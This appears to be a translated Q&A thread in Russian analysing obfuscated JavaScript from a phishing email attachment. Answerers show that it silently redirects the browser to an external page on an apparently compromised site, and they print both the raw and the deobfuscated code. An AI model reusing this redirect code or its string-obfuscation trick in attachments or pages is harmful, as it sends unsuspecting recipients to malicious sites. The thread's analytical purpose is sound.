Что делает этот подозрительный фишинговый код?

Несколько моих коллег, не связанных с IT, открыли a .html-вложение в сообщение электронной почты, которое выглядит крайне подозрительно. Это привело к пустому экрану, когда он появляется, что какой-то код javascript был запущен. 

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[^H!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr]6>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

Что он сделал? Это выходит за рамки моих познаний в программировании.

4 6
javascript phishing

4 ответа:

Он перенаправит на url, ' http://lendermedia.com/images/z.htm ' (следуйте ему на свой страх и риск).

Скопируйте и вставьте код в достойный редактор JavaScript и пусть он отформатирует исходный код для вас.

Ключевые моменты: 

var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');

h будет равно " http://lendermedia.com/images/z.htm '

t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];

t будет содержать ссылку на document.location 

b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;

Свойство с именем href из b, которое в этот момент (внутри другой функции) действительно является t из приведенного выше утверждения, имеет значение h, которое является url.

Большая часть кода-это просто шум, фактическая функциональность состоит из этого: 

function uK() {
};
uK.prototype = {
  f : function() {
    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'
        .replace(/[\^H\!9X]/g, '');
    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
    function x(b) {
      b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
    }
    x(t);
  }
};
var tL = new uK();
tL.f();
19

Я столкнулся с той же проблемой, а затем нашел эту страницу. После того, как я сделал WHOIS для контактной информации, я связался с владельцем lendermedia.com, который, казалось, только что узнал, что его сайт размещает страницу z.htm без его ведома и против его желания. В то время, когда я связался с ним, я смог просмотреть его каталог /images/. С тех пор он изменил разрешения. Все это говорит о том, что, похоже, этот парень чист, но это вам решать.

2

Минус обфускация, он делает что-то вроде document.location.href="http://lendermedia.com/images/z.htm"

0

Ключевая часть дляпонимания , что код-это части replace(/[\^H\!9X]/g, ''). если 2-й аргумент для замены - '', то это просто удаление материала из предыдущей строки.

Действительно неэлегантный способ запутывать вещи. Вероятно, цель состоит в том, чтобы быть случайным для каждого пользователя и избегать байесовских спам-фильтров.

0